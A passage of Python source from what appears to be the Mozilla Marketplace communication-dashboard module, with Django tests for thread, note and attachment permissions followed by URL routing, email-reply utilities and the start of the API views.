        staff = UserProfile.objects.get(username='support_staff')
        self.addon.addonuser_set.create(user=self.profile)
        thread = self._thread_factory(read_permission_developer=True)
        self._note_factory(
            thread, perms=['developer'], author=staff, body='allowed')
        no_dev_note = self._note_factory(
            thread, no_perms=['developer'], author=staff)
        # Test that the developer can't access no-developer note.
        res = self.client.get(
            reverse('comm-thread-detail', kwargs={'pk': thread.pk}))
        eq_(res.status_code, 200)
        eq_(len(res.json['recent_notes']), 1)
        eq_(res.json['recent_notes'][0]['body'], 'allowed')
        eq_(res.json['addon'], self.addon.id)
        # Test that the author always has permissions.
        no_dev_note.update(author=self.profile)
        res = self.client.get(
            reverse('comm-thread-detail', kwargs={'pk': thread.pk}))
        eq_(len(res.json['recent_notes']), 2)
    def test_cc(self):
        # Being on the thread's CC list grants read access by itself.
        # Test with no CC.
        thread = self._thread_factory()
        assert not self.check_permissions(thread)
        # Test with CC created.
        thread.thread_cc.create(user=self.profile)
        assert self.check_permissions(thread)
    def test_addon_dev_allowed(self):
        # Developer of THIS app can read developer-visible threads.
        thread = self._thread_factory(perms=['developer'])
        self.addon.addonuser_set.create(user=self.profile)
        assert self.check_permissions(thread)
    def test_addon_dev_denied(self):
        """Test when the user is a developer of a different add-on."""
        thread = self._thread_factory(perms=['developer'])
        self.profile.addonuser_set.create(addon=addon_factory())
        assert not self.check_permissions(thread)
    def test_read_public(self):
        # Public threads are readable by anyone.
        thread = self._thread_factory(perms=['public'])
        assert self.check_permissions(thread)
    def test_read_moz_contact(self):
        # The app's listed Mozilla contact gets mozilla_contact access.
        thread = self._thread_factory(perms=['mozilla_contact'])
        self.addon.update(mozilla_contact=self.profile.email)
        assert self.check_permissions(thread)
    def test_read_reviewer(self):
        # Apps:Review permission maps to the reviewer flag.
        thread = self._thread_factory(perms=['reviewer'])
        self.grant_permission(self.profile, 'Apps:Review')
        assert self.check_permissions(thread)
    def test_read_senior_reviewer(self):
        # Apps:ReviewEscalated maps to the senior_reviewer flag.
        thread = self._thread_factory(perms=['senior_reviewer'])
        self.grant_permission(self.profile, 'Apps:ReviewEscalated')
        assert self.check_permissions(thread)
    def test_read_staff(self):
        # Admin:% (any admin permission) maps to the staff flag.
        thread = self._thread_factory(perms=['staff'])
        self.grant_permission(self.profile, 'Admin:%')
        assert self.check_permissions(thread)
    def test_cors_allowed(self):
        # CORS must expose get/post/patch on the detail endpoint.
        thread = self._thread_factory()
        res = self.client.get(
            reverse('comm-thread-detail', kwargs={'pk': thread.pk}))
        self.assertCORS(res, 'get', 'post', 'patch')
    def test_mark_read(self):
        # PATCH {is_read: true} marks every note in the thread read for
        # the requesting user.
        thread = self._thread_factory()
        note1 = self._note_factory(thread)
        note2 = self._note_factory(thread)
        res = self.client.patch(
            reverse('comm-thread-detail', kwargs={'pk': thread.pk}),
            data=json.dumps({'is_read': True}))
        eq_(res.status_code, 204)
        assert note1.read_by_users.filter(pk=self.profile.pk).exists()
        assert note2.read_by_users.filter(pk=self.profile.pk).exists()
    def test_review_url(self):
        # The serialized addon_meta includes the reviewer-tools URL.
        thread = self._thread_factory(note=True)
        res = self.client.get(
            reverse('comm-thread-detail', kwargs={'pk': thread.pk}))
        eq_(res.status_code, 200)
        eq_(res.json['addon_meta']['review_url'],
            reverse('reviewers.apps.review', args=[self.addon.app_slug]))
    def test_version_number(self):
        # Threads keep reporting their version number even after the
        # version is (soft-)deleted; the obsolete flag flips instead.
        version = version_factory(addon=self.addon, version='7.12')
        thread = CommunicationThread.objects.create(
            addon=self.addon, version=version, read_permission_public=True)
        res = self.client.get(reverse('comm-thread-detail', args=[thread.pk]))
        eq_(json.loads(res.content)['version_number'], '7.12')
        eq_(json.loads(res.content)['version_is_obsolete'], False)
        version.delete()
        res = self.client.get(reverse('comm-thread-detail', args=[thread.pk]))
        eq_(json.loads(res.content)['version_number'], '7.12')
        eq_(json.loads(res.content)['version_is_obsolete'], True)
    def test_app_threads(self):
        # app_threads lists all of the app's threads ordered by
        # version string (note: lexicographic, so '1.16' < '7.12').
        version1 = version_factory(addon=self.addon, version='7.12')
        thread1 = CommunicationThread.objects.create(
            addon=self.addon, version=version1, read_permission_public=True)
        version2 = version_factory(addon=self.addon, version='1.16')
        thread2 = CommunicationThread.objects.create(
            addon=self.addon, version=version2, read_permission_public=True)
        for thread in (thread1, thread2):
            res = self.client.get(reverse('comm-thread-detail',
                                          args=[thread.pk]))
            eq_(res.status_code, 200)
            eq_(json.loads(res.content)['app_threads'],
                [{"id": thread2.id, "version__version": version2.version},
                 {"id": thread1.id, "version__version": version1.version}])
class TestThreadList(RestOAuth, CommTestMixin):
    # Tests for comm-thread-list: listing, app filtering and creation
    # (creation is gated by the comm-dashboard waffle switch).
    fixtures = fixture('webapp_337141', 'user_2519')
    def setUp(self):
        super(TestThreadList, self).setUp()
        self.create_switch('comm-dashboard')
        self.addon = Webapp.objects.get(pk=337141)
        self.list_url = reverse('comm-thread-list')
    def test_response(self):
        """Test the list response, we don't want public threads in the list."""
        self._thread_factory(note=True, perms=['public'])
        res = self.client.get(self.list_url)
        eq_(res.status_code, 200)
        eq_(len(res.json['objects']), 1)
    def test_addon_filter(self):
        # ?app=<id> restricts to that app's threads; unknown id is a 404.
        self._thread_factory(note=True)
        self.grant_permission(self.user, 'Apps:Review')
        res = self.client.get(self.list_url, {'app': '337141'})
        eq_(res.status_code, 200)
        eq_(len(res.json['objects']), 1)
        # This add-on doesn't exist.
        res = self.client.get(self.list_url, {'app': '1000'})
        eq_(res.status_code, 404)
    def test_app_slug(self):
        # ?app= also accepts the app slug, echoed back in addon_meta.
        thread = CommunicationThread.objects.create(addon=self.addon)
        CommunicationNote.objects.create(author=self.profile, thread=thread,
                                         note_type=0, body='something')
        self.grant_permission(self.user, 'Apps:Review')
        res = self.client.get(self.list_url, {'app': self.addon.app_slug})
        eq_(res.status_code, 200)
        eq_(res.json['objects'][0]['addon_meta']['app_slug'],
            self.addon.app_slug)
    def test_app_threads(self):
        # Filtering by app adds app_threads ordered by version string.
        version1 = version_factory(addon=self.addon, version='7.12')
        thread1 = CommunicationThread.objects.create(
            addon=self.addon, version=version1, read_permission_public=True)
        CommunicationThreadCC.objects.create(user=self.profile, thread=thread1)
        version2 = version_factory(addon=self.addon, version='1.16')
        thread2 = CommunicationThread.objects.create(
            addon=self.addon, version=version2, read_permission_public=True)
        CommunicationThreadCC.objects.create(user=self.profile, thread=thread2)
        self.grant_permission(self.user, 'Apps:Review')
        res = self.client.get(self.list_url, {'app': self.addon.app_slug})
        eq_(res.status_code, 200)
        eq_(res.json['app_threads'],
            [{'id': thread2.id, 'version__version': version2.version},
             {'id': thread1.id, 'version__version': version1.version}])
    def test_create(self):
        # POSTing thread data as the app's developer creates a thread.
        self.create_switch('comm-dashboard')
        version_factory(addon=self.addon, version='1.1')
        data = {
            'app': self.addon.app_slug,
            'version': '1.1',
            'note_type': '0',
            'body': 'flylikebee'
        }
        self.addon.addonuser_set.create(user=self.user)
        res = self.client.post(self.list_url, data=json.dumps(data))
        eq_(res.status_code, 201)
        assert self.addon.threads.count()
    @mock.patch('waffle.switch_is_active')
    def test_create_no_switch(self, waffle_mock):
        # With the comm-dashboard switch off, creation is forbidden.
        waffle_mock.return_value = False
        version_factory(addon=self.addon, version='1.1')
        data = {
            'app': self.addon.app_slug,
            'version': '1.1',
            'note_type': '0',
            'body': 'flylikebee'
        }
        self.addon.addonuser_set.create(user=self.user)
        res = self.client.post(self.list_url, data=json.dumps(data))
        eq_(res.status_code, 403)
class NoteSetupMixin(RestOAuth, CommTestMixin, AttachmentManagementMixin):
    # Shared setUp for note/attachment tests: a developer-visible thread
    # on app 337141, with self.profile added as one of its developers.
    fixtures = fixture('webapp_337141', 'user_2519', 'user_999',
                       'user_support_staff')
    def setUp(self):
        super(NoteSetupMixin, self).setUp()
        self.create_switch('comm-dashboard')
        self.addon = Webapp.objects.get(pk=337141)
        self.thread = self._thread_factory(
            perms=['developer'], version=self.addon.current_version)
        self.thread_url = reverse(
            'comm-thread-detail', kwargs={'pk': self.thread.id})
        self.list_url = reverse(
            'comm-note-list', kwargs={'thread_id': self.thread.id})
        self.profile.addonuser_set.create(addon=self.addon)
class TestNote(NoteSetupMixin):
    # Tests for the comm-note endpoints: serialization, read filtering,
    # permissions, creation and read-marking.
    @override_settings(REVIEWER_ATTACHMENTS_PATH=TESTS_DIR)
    def test_response(self):
        # Detail response carries body, read state and attachment metadata.
        note = self._note_factory(self.thread)
        attach = note.attachments.create(filepath='test_views.py',
                                         description='desc')
        res = self.client.get(reverse(
            'comm-note-detail',
            kwargs={'thread_id': self.thread.id, 'pk': note.id}))
        eq_(res.status_code, 200)
        eq_(res.json['body'], 'something')
        eq_(res.json['is_read'], False)
        # Read.
        note.mark_read(self.profile)
        res = self.client.get(reverse('comm-note-detail',
                                      kwargs={'thread_id': self.thread.id,
                                              'pk': note.id}))
        eq_(res.json['is_read'], True)
        # Attachments.
        eq_(len(res.json['attachments']), 1)
        eq_(res.json['attachments'][0]['url'],
            settings.SITE_URL +
            reverse('comm-attachment-detail', args=[note.id, attach.id]))
        eq_(res.json['attachments'][0]['display_name'], 'desc')
        ok_(not res.json['attachments'][0]['is_image'])
    def test_show_read_filter(self):
        """Test `is_read` filter."""
        # Any truthy ?show_read value selects read notes; falsy selects
        # unread ones.
        note = self._note_factory(self.thread)
        note.mark_read(self.profile)
        # Test with `show_read=true`.
        res = self.client.get(self.list_url, {'show_read': 'truey'})
        eq_(res.json['objects'][0]['is_read'], True)
        res = self.client.get(self.list_url, {'show_read': '0'})
        ok_(not res.json['objects'])
        # Test with `show_read=false`.
        note.reads_set.all().delete()
        res = self.client.get(self.list_url, {'show_read': '0'})
        eq_(res.json['objects'][0]['is_read'], False)
    def test_read_perms(self):
        # Developer only sees developer-visible notes, but always their own.
        staff = UserProfile.objects.get(username='support_staff')
        self._note_factory(
            self.thread, perms=['developer'], author=staff, body='oncetoldme')
        no_dev_note = self._note_factory(
            self.thread, no_perms=['developer'], author=staff)
        res = self.client.get(self.list_url)
        eq_(res.status_code, 200)
        eq_(len(res.json['objects']), 1)
        eq_(res.json['objects'][0]['body'], 'oncetoldme')
        # Test that the author always has permissions.
        no_dev_note.update(author=self.profile)
        res = self.client.get(self.list_url)
        eq_(len(res.json['objects']), 2)
    def test_create(self):
        # Creating a note emails the thread participants, minus the author.
        res = self.client.post(self.list_url, data=json.dumps(
            {'note_type': '0', 'body': 'something'}))
        eq_(res.status_code, 201)
        eq_(res.json['body'], 'something')
        # Decrement authors.count() by 1 because the author of the note is
        # one of the authors of the addon.
        eq_(len(mail.outbox), self.thread.addon.authors.count() - 1)
    def test_create_no_perm(self):
        # Without developer read permission, posting a note is forbidden.
        self.thread.update(read_permission_developer=False)
        res = self.client.post(self.list_url, data=json.dumps(
            {'note_type': '0', 'body': 'something'}))
        eq_(res.status_code, 403)
    @mock.patch('waffle.switch_is_active')
    def test_create_no_switch(self, waffle_mock):
        # Note creation is gated by the comm-dashboard waffle switch.
        waffle_mock.return_value = False
        res = self.client.post(self.list_url, data=json.dumps(
            {'note_type': '0', 'body': 'something'}))
        eq_(res.status_code, 403)
    def test_cors_allowed(self):
        res = self.client.get(self.list_url)
        self.assertCORS(res, 'get', 'post', 'patch')
    def test_mark_read(self):
        # PATCH {is_read: true} records a read entry for the requester.
        note = self._note_factory(self.thread)
        note.mark_read(self.profile)
        res = self.client.patch(
            reverse('comm-note-detail',
                    kwargs={'thread_id': self.thread.id,
                            'pk': note.id}),
            data=json.dumps({'is_read': True}))
        eq_(res.status_code, 204)
        assert note.read_by_users.filter(pk=self.profile.pk).exists()
@override_settings(REVIEWER_ATTACHMENTS_PATH=ATTACHMENTS_DIR)
class TestAttachments(NoteSetupMixin):
    # Tests for comm-attachment endpoints: upload limits, ownership
    # checks and x-sendfile delivery.
    def setUp(self):
        super(TestAttachments, self).setUp()
        self.note = self._note_factory(self.thread, author=self.profile)
        self.attachment_url = reverse(
            'comm-attachment-list', kwargs={'note_id': self.note.id})
    def test_cors_bad_request(self):
        # Even a 400 response must carry the CORS headers.
        res = self.client.post(self.attachment_url, data={},
                               content_type=MULTIPART_CONTENT)
        eq_(res.status_code, 400)
        self.assertCORS(res, 'get', 'post')
    def _save_attachment_mock(self, storage, attachment, filepath):
        # Stand-in for mkt.comm.utils._save_attachment so no file is
        # written; returns a deterministic name per file type.
        if 'jpg' in filepath:
            return 'bacon.jpg'
        return 'bacon.txt'
    @mock.patch('mkt.comm.utils._save_attachment')
    def test_create_attachment(self, _mock):
        # Uploading two files creates two CommAttachment rows with the
        # right descriptions and is_image flags.
        _mock.side_effect = self._save_attachment_mock
        data = self._attachments(num=2)
        res = self.client.post(self.attachment_url, data=data,
                               content_type=MULTIPART_CONTENT)
        eq_(res.status_code, 201)
        eq_(CommAttachment.objects.count(), 2)
        attach1 = CommAttachment.objects.all()[0]
        eq_(attach1.note, self.note)
        eq_(attach1.filepath, 'bacon.txt')
        eq_(attach1.description, '')
        assert not attach1.is_image()
        attach2 = CommAttachment.objects.all()[1]
        eq_(attach2.note, self.note)
        eq_(attach2.filepath, 'bacon.jpg')
        eq_(attach2.description, 'mmm, bacon')
        assert attach2.is_image()
    @mock.patch.object(mkt.constants.comm, 'MAX_ATTACH', 1)
    def test_max_attach(self):
        # Exceeding MAX_ATTACH files per note is rejected with a 400.
        data = self._attachments(num=2)
        res = self.client.post(self.attachment_url, data=data,
                               content_type=MULTIPART_CONTENT)
        eq_(res.status_code, 400)
    def test_not_note_owner(self):
        # Only the note's author may attach files to it.
        self.note.update(author=user_factory())
        data = self._attachments(num=2)
        res = self.client.post(self.attachment_url, data=data,
                               content_type=MULTIPART_CONTENT)
        eq_(res.status_code, 403)
    @mock.patch('mkt.comm.utils._save_attachment', new=mock.Mock())
    @mock.patch('mkt.comm.models.CommAttachment.is_image', new=mock.Mock())
    def test_get_attachment(self):
        # Download is served via the x-sendfile header (requires the
        # XSENDFILE setting, otherwise the test is skipped).
        if not settings.XSENDFILE:
            raise SkipTest
        data = self._attachments(num=1)
        res = self.client.post(self.attachment_url, data=data,
                               content_type=MULTIPART_CONTENT)
        attachment_id = res.json['attachments'][0]['id']
        get_attachment_url = reverse('comm-attachment-detail',
                                     args=[self.note.id, attachment_id])
        res = self.client.get(get_attachment_url)
        eq_(res.status_code, 200)
        eq_(res._headers['x-sendfile'][1],
            CommAttachment.objects.get(id=attachment_id).full_path())
    @mock.patch('mkt.comm.utils._save_attachment', new=mock.Mock())
    @mock.patch('mkt.comm.models.CommAttachment.is_image', new=mock.Mock())
    def test_get_attachment_not_note_perm(self):
        # Users without read access to the note cannot fetch attachments.
        data = self._attachments(num=1)
        res = self.client.post(self.attachment_url, data=data,
                               content_type=MULTIPART_CONTENT)
        attachment_id = res.json['attachments'][0]['id']
        # Remove perms.
        self.note.update(author=user_factory())
        self.profile.addonuser_set.all().delete()
        get_attachment_url = reverse('comm-attachment-detail',
                                     args=[self.note.id, attachment_id])
        res = self.client.get(get_attachment_url)
        eq_(res.status_code, 403)
@mock.patch.object(settings, 'WHITELISTED_CLIENTS_EMAIL_API',
                   ['10.10.10.10'])
@mock.patch.object(settings, 'POSTFIX_AUTH_TOKEN', 'something')
class TestEmailApi(RestOAuth):
    # Tests for the postfix inbound-email endpoint: access is gated by a
    # whitelisted source IP AND a shared auth-token header.
    def get_request(self, data=None):
        # Build a request that passes both checks by default; individual
        # tests then break one factor at a time.
        req = req_factory_factory(reverse('post-email-api'), self.profile)
        req.META['REMOTE_ADDR'] = '10.10.10.10'
        req.META['HTTP_POSTFIX_AUTH_TOKEN'] = 'something'
        req.POST = dict(data) if data else dict({})
        req.method = 'POST'
        return req
    def test_allowed(self):
        assert EmailCreationPermission().has_permission(self.get_request(),
                                                        None)
    def test_ip_denied(self):
        # Wrong source IP -> denied, even with a valid token.
        req = self.get_request()
        req.META['REMOTE_ADDR'] = '10.10.10.1'
        assert not EmailCreationPermission().has_permission(req, None)
    def test_token_denied(self):
        # Wrong auth token -> denied, even from a whitelisted IP.
        req = self.get_request()
        req.META['HTTP_POSTFIX_AUTH_TOKEN'] = 'somethingwrong'
        assert not EmailCreationPermission().has_permission(req, None)
    @mock.patch('mkt.comm.tasks.consume_email.apply_async')
    def test_successful(self, _mock):
        # A valid post queues the email body for async consumption.
        req = self.get_request({'body': 'something'})
        res = post_email(req)
        _mock.assert_called_with(('something',))
        eq_(res.status_code, 201)
    def test_bad_request(self):
        """Test with no email body."""
        res = post_email(self.get_request())
        eq_(res.status_code, 400)
class TestCommCC(RestOAuth, CommTestMixin):
    # Tests for the comm-thread-cc endpoint (unsubscribing from a thread).
    fixtures = fixture('webapp_337141', 'user_2519', 'user_support_staff')
    def setUp(self):
        super(TestCommCC, self).setUp()
        self.addon = Webapp.objects.get(pk=337141)
        self.profile = UserProfile.objects.get(id=2519)
    def test_delete(self):
        # DELETE removes the requesting user's CC entry for the thread.
        thread = self._thread_factory()
        ok_(thread.thread_cc.create(user=self.profile))
        res = self.client.delete(
            reverse('comm-thread-cc-detail', args=[thread.id]))
        eq_(res.status_code, 204)
        eq_(CommunicationThreadCC.objects.count(), 0)
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import include, patterns, url
from rest_framework.routers import DefaultRouter
from mkt.comm.views import (AttachmentViewSet, NoteViewSet, post_email,
ThreadCCViewSet, ThreadViewSet)
# DRF router wiring for the comm API. URL names are derived from the
# base_name values (e.g. comm-thread-detail, comm-note-list).
api_thread = DefaultRouter()
api_thread.register(r'thread', ThreadViewSet, base_name='comm-thread')
api_thread.register(r'thread/(?P<thread_id>\d+)/note', NoteViewSet,
                    base_name='comm-note')
api_thread.register(
    r'thread/subscribe', ThreadCCViewSet, base_name='comm-thread-cc')
api_thread.register(
    r'note/(?P<note_id>\d+)/attachment',
    AttachmentViewSet, base_name='comm-attachment')
# Mounted under /comm/; the email endpoint is a plain function view used
# by the postfix inbound-mail hook.
api_patterns = patterns('',
    url(r'^comm/', include(api_thread.urls)),
    url(r'^comm/email/', post_email, name='post-email-api')
)
########NEW FILE########
__FILENAME__ = utils
import base64
import urllib2
from email import message_from_string
from email.utils import parseaddr
from django.conf import settings
from django.core.files.storage import get_storage_class
import commonware.log
import waffle
from email_reply_parser import EmailReplyParser
from access.models import Group
from users.models import UserProfile
from mkt.comm.models import (CommunicationNoteRead, CommunicationThreadToken,
user_has_perm_thread)
from mkt.constants import comm
log = commonware.log.getLogger('comm')
class CommEmailParser(object):
    """Utility to parse email replies."""
    # Replies are addressed to "<prefix><uuid>@<domain>"; the uuid maps to
    # a CommunicationThreadToken.
    address_prefix = comm.REPLY_TO_PREFIX
    def __init__(self, email_text):
        """Decode base64 email and turn it into a Django email object."""
        try:
            email_text = base64.standard_b64decode(
                urllib2.unquote(email_text.rstrip()))
        except TypeError:
            # Corrupt or invalid base 64.
            # Callers detect this via hasattr(parser, 'decode_error').
            self.decode_error = True
            return
        self.email = message_from_string(email_text)
        # NOTE(review): assumes a single-part message — get_payload()
        # returns a list for multipart emails, which EmailReplyParser
        # would not accept. TODO confirm inbound mail is never multipart.
        self.reply_text = EmailReplyParser.read(self.email.get_payload()).reply
    def _get_address_line(self):
        # Returns (display-name, address) parsed from the To: header.
        return parseaddr(self.email['to'])
    def get_uuid(self):
        """Extract the reply-token uuid from the To: address.

        Returns False when the address is missing or not a comm
        reply-to address.
        """
        name, addr = self._get_address_line()
        if addr.startswith(self.address_prefix):
            # Strip everything between "reply+" and the "@" sign.
            uuid = addr[len(self.address_prefix):].split('@')[0]
        else:
            log.info('TO: address missing or not related to comm. (%s)'
                     % unicode(self.email).strip())
            return False
        return uuid
    def get_body(self):
        # The reply portion only (quoted original text stripped).
        return self.reply_text
def save_from_email_reply(reply_text):
    """Turn an inbound email reply into a note on its thread.

    Looks up the reply token embedded in the To: address, validates it
    and the sender's thread permissions, then posts the reply body as a
    new note. Returns the created note, or False on any failure.
    """
    parser = CommEmailParser(reply_text)
    # Bail out early on undecodable input or a non-comm address.
    if hasattr(parser, 'decode_error'):
        return False
    uuid = parser.get_uuid()
    if not uuid:
        return False
    try:
        token = CommunicationThreadToken.objects.get(uuid=uuid)
    except CommunicationThreadToken.DoesNotExist:
        log.error('An email was skipped with non-existing uuid %s.' % uuid)
        return False
    token_valid = token.is_valid()
    if token_valid and user_has_perm_thread(token.thread, token.user):
        _, note = create_comm_note(token.thread.addon, token.thread.version,
                                   token.user, parser.get_body())
        log.info('A new note has been created (from %s using tokenid %s).'
                 % (token.user.id, uuid))
        return note
    if token_valid:
        log.error('%s did not have perms to reply to comm email thread %s.'
                  % (token.user.email, token.thread.id))
    else:
        log.error('%s tried to use an invalid comm token for thread %s.'
                  % (token.user.email, token.thread.id))
    return False
def filter_notes_by_read_status(queryset, profile, read_status=True):
    """
    Narrow `queryset` to notes `profile` has read (or not read).

    `read_status` = `True` keeps only read notes, `False` only unread.
    """
    # IDs of every note this user has marked read.
    read_ids = list(CommunicationNoteRead.objects.filter(
        user=profile).values_list('note', flat=True))
    if not read_ids:
        # Nothing read yet: there are no read notes, and every note is
        # unread.
        return queryset.none() if read_status else queryset.all()
    if read_status:
        return queryset.filter(pk__in=read_ids)
    return queryset.exclude(pk__in=read_ids)
def get_reply_token(thread, user_id):
    """Return the email reply token for (thread, user), creating one if
    needed."""
    token, fresh = CommunicationThreadToken.objects.get_or_create(
        thread=thread, user_id=user_id)
    if fresh:
        log.info('Created token with UUID %s for user_id: %s.' %
                 (token.uuid, user_id))
    else:
        # Tokens expire after a maximum number of uses (anti-spam).
        # Since we re-use tokens, reset the counter so the token stays
        # valid for replying to the new note.
        token.update(use_count=0)
    return token
def get_recipients(note):
    """
    Determine email recipients based on a new note based on those who are on
    the thread_cc list and note permissions.
    Returns reply-to-tokenized emails.
    """
    thread = note.thread
    # Recipients are handled as (user_id, email) pairs throughout so the
    # exclusion check below compares whole tuples.
    recipients = []
    # Whitelist: include recipients.
    if note.note_type == comm.ESCALATION:
        # Email only senior reviewers on escalations.
        seniors = Group.objects.get(name='Senior App Reviewers')
        recipients = seniors.users.values_list('id', 'email')
    else:
        # Get recipients via the CommunicationThreadCC table, which is usually
        # populated with the developer, the Mozilla contact, and anyone that
        # posts to and reviews the app.
        recipients = set(thread.thread_cc.values_list(
            'user__id', 'user__email'))
    # Blacklist: exclude certain people from receiving the email based on
    # permission.
    excludes = []
    if not note.read_permission_developer:
        # Exclude developer.
        excludes += thread.addon.authors.values_list('id', 'email')
    # Exclude note author.
    excludes.append((note.author.id, note.author.email))
    # Remove excluded people from the recipients.
    recipients = [r for r in recipients if r not in excludes]
    # Build reply-to-tokenized email addresses.
    new_recipients_list = []
    for user_id, user_email in recipients:
        # Each recipient gets a personal token so their email replies can
        # be routed back to this thread.
        tok = get_reply_token(note.thread, user_id)
        new_recipients_list.append((user_email, tok.uuid))
    return new_recipients_list
def send_mail_comm(note):
    """
    Email utility used globally by the Communication Dashboard to send emails.
    Given a note (its actions and permissions), recipients are determined and
    emails are sent to appropriate people.
    """
    # Imported here to avoid a circular import with mkt.reviewers.
    from mkt.reviewers.utils import send_mail
    # No-op unless the comm dashboard waffle switch is on.
    if not waffle.switch_is_active('comm-dashboard'):
        return
    recipients = get_recipients(note)
    name = note.thread.addon.name
    data = {
        'name': name,
        'sender': note.author.name,
        'comments': note.body,
        'thread_id': str(note.thread.id)
    }
    # Escalations get a dedicated subject; everything else is generic.
    subject = {
        comm.ESCALATION: u'Escalated Review Requested: %s' % name,
    }.get(note.note_type, u'Submission Update: %s' % name)
    log.info(u'Sending emails for %s' % note.thread.addon)
    for email, tok in recipients:
        # Per-recipient reply-to address embedding their reply token.
        reply_to = '{0}{1}@{2}'.format(comm.REPLY_TO_PREFIX, tok,
                                       settings.POSTFIX_DOMAIN)
        send_mail(subject, 'reviewers/emails/decisions/post.txt', data,
                  [email], perm_setting='app_reviewed', reply_to=reply_to)
def create_comm_note(app, version, author, body, note_type=comm.NO_ACTION,
                     perms=None, no_switch=False, attachments=None):
    """
    Create a note on an app version's thread, creating the thread first
    if one doesn't exist, and CC the app's Mozilla contacts onto it.

    app -- app object.
    version -- app version.
    author -- UserProfile for the note's author.
    body -- string/text for note comment.
    note_type -- integer note_type constant, defaults to comm.NO_ACTION
        (e.g. comm.APPROVAL, comm.REJECTION).
    perms -- dict of group name -> bool, sets read flags on the thread
        (e.g. {'developer': False, 'staff': True}).
    no_switch -- bypass the comm-dashboard waffle switch (needed once
        reviewer tools migrate from ActivityLog to notes).
    attachments -- formset of attachment files.

    Returns (thread, note), or (None, None) when the switch is off.
    """
    if not no_switch and not waffle.switch_is_active('comm-dashboard'):
        return None, None
    perms = perms or {}
    # Escalations and reviewer comments are hidden from developers unless
    # the caller explicitly says otherwise. Reviewer/senior-reviewer/
    # mozilla-contact/staff visibility defaults to True on the model.
    if ('developer' not in perms and
            note_type in (comm.ESCALATION, comm.REVIEWER_COMMENT)):
        perms['developer'] = False
    # Expand to {'read_permission_<group>': bool} model field names.
    create_perms = {}
    for group, has_perm in perms.iteritems():
        create_perms['read_permission_%s' % group] = has_perm
    # Create thread + note.
    thread, _created = app.threads.safer_get_or_create(
        version=version, defaults=create_perms)
    note = thread.notes.create(
        note_type=note_type, body=body, author=author, **create_perms)
    if attachments:
        create_attachments(note, attachments)
    post_create_comm_note(note)
    return thread, note
def post_create_comm_note(note):
    """Follow-up work after a note is created (also used by the comm API's
    post_save): join the developers, Mozilla contacts and author to the
    thread, then send notification emails."""
    thread = note.thread
    app = thread.addon
    # Add every developer of the app to the thread.
    for developer in app.authors.all():
        thread.join_thread(developer)
    # Add the app's Mozilla contacts, skipping addresses without accounts.
    for contact_email in app.get_mozilla_contacts():
        try:
            contact = UserProfile.objects.get(email=contact_email)
        except UserProfile.DoesNotExist:
            continue
        thread.join_thread(contact)
    # Add the note's author; if they were already on the thread, mark
    # their own note as read for them.
    _cc, newly_joined = thread.join_thread(note.author)
    if not newly_joined:
        note.mark_read(note.author)
    # Send out emails.
    send_mail_comm(note)
def create_attachments(note, formset):
    """Persist each valid file in a CommAttachmentFormSet onto `note`.

    Returns the list of per-form error dicts for forms that failed
    validation (empty list when everything saved).
    """
    errors = []
    storage = get_storage_class()()
    for form in formset:
        if not form.is_valid():
            errors.append(form.errors)
            continue
        cleaned = form.cleaned_data
        # Blank extra forms produce empty cleaned_data; skip them.
        if not cleaned:
            continue
        uploaded = cleaned['attachment']
        # The storage backend may rename on collision, so keep the name
        # it actually used.
        saved_name = _save_attachment(
            storage, uploaded,
            '%s/%s' % (settings.REVIEWER_ATTACHMENTS_PATH, uploaded.name))
        note.attachments.create(
            description=cleaned.get('description'), filepath=saved_name,
            mimetype=uploaded.content_type)
    return errors
def _save_attachment(storage, attachment, filepath):
"""Saves an attachment and returns the filename."""
filepath = storage.save(filepath, attachment)
# In case of duplicate filename, storage suffixes filename.
return filepath.split('/')[-1]
########NEW FILE########
__FILENAME__ = views
import os
from django.conf import settings
from django.db.models import Q
from django.shortcuts import get_object_or_404
import waffle
from rest_framework import status
from rest_framework.authentication import BaseAuthentication
from rest_framework.decorators import (api_view, authentication_classes,
permission_classes)
from rest_framework.exceptions import ParseError
from rest_framework.fields import BooleanField
from rest_framework.filters import BaseFilterBackend, OrderingFilter
from rest_framework.mixins import (CreateModelMixin, DestroyModelMixin,
ListModelMixin, RetrieveModelMixin)
from rest_framework.parsers import FormParser, JSONParser
from rest_framework.response import Response
from rest_framework.viewsets import GenericViewSet
from amo.decorators import skip_cache
from amo.utils import HttpResponseSendFile
import mkt.comm.forms as forms
import mkt.constants.comm as comm
from mkt.api.authentication import (RestOAuthAuthentication,
RestSharedSecretAuthentication)
from mkt.api.base import CORSMixin, MarketplaceView, SilentListModelMixin
from mkt.comm.authorization import (AttachmentPermission,
EmailCreationPermission, NotePermission,
ThreadPermission)
from mkt.comm.models import (CommAttachment, CommunicationNote,
CommunicationNoteRead, CommunicationThread,
CommunicationThreadCC)
from mkt.comm.serializers import NoteSerializer, ThreadSerializer
from mkt.comm.models import user_has_perm_app
from mkt.comm.tasks import consume_email, mark_thread_read
from mkt.comm.utils import (create_attachments, create_comm_note,
filter_notes_by_read_status)
class NoAuthentication(BaseAuthentication):
    """DRF authentication class that simply trusts whatever user Django's
    middleware already attached to the underlying request."""
    def authenticate(self, request):
        # No credential check; second tuple element (auth) is None.
        django_request = request._request
        return django_request.user, None
class ReadUnreadFilter(BaseFilterBackend):
    # Filters note querysets by the requesting user's read state, driven
    # by the optional `show_read` query parameter.
    filter_param = 'show_read'
    def filter_queryset(self, request, queryset, view):
        """
        Return only read notes if `show_read` is truthy and only unread
        notes if `show_read` is falsy; absent parameter leaves the
        queryset untouched.
        """
        val = request.GET.get('show_read')
        if val is None:
            return queryset
        # BooleanField handles '0'/'false'/'true' style values.
        show_read = BooleanField().from_native(val)
        return filter_notes_by_read_status(queryset, request.amo_user,
                                           show_read)
class CommViewSet(CORSMixin, MarketplaceView, GenericViewSet):
    """Some overriding and mixin stuff to adapt other viewsets."""
    parser_classes = (FormParser, JSONParser)
    def patched_get_request(self):
        # Callable handed to serializers so they can reach the current
        # request regardless of context.
        return lambda x: self.request
    def get_serializer_class(self):
        original = super(CommViewSet, self).get_serializer_class()
        # NOTE(review): this sets an attribute on the serializer CLASS,
        # not an instance — it is shared process-wide across requests.
        original.get_request = self.patched_get_request()
        return original
    def partial_update(self, request, *args, **kwargs):
        """PATCH handler: only supports {'is_read': true} to mark the
        object read for the requesting user. Subclasses must provide
        mark_as_read()."""
        val = BooleanField().from_native(request.DATA.get('is_read'))
        if val:
            self.mark_as_read(request.amo_user)
            return Response(status=status.HTTP_204_NO_CONTENT)
        else:
            return Response('Requested update operation not supported',
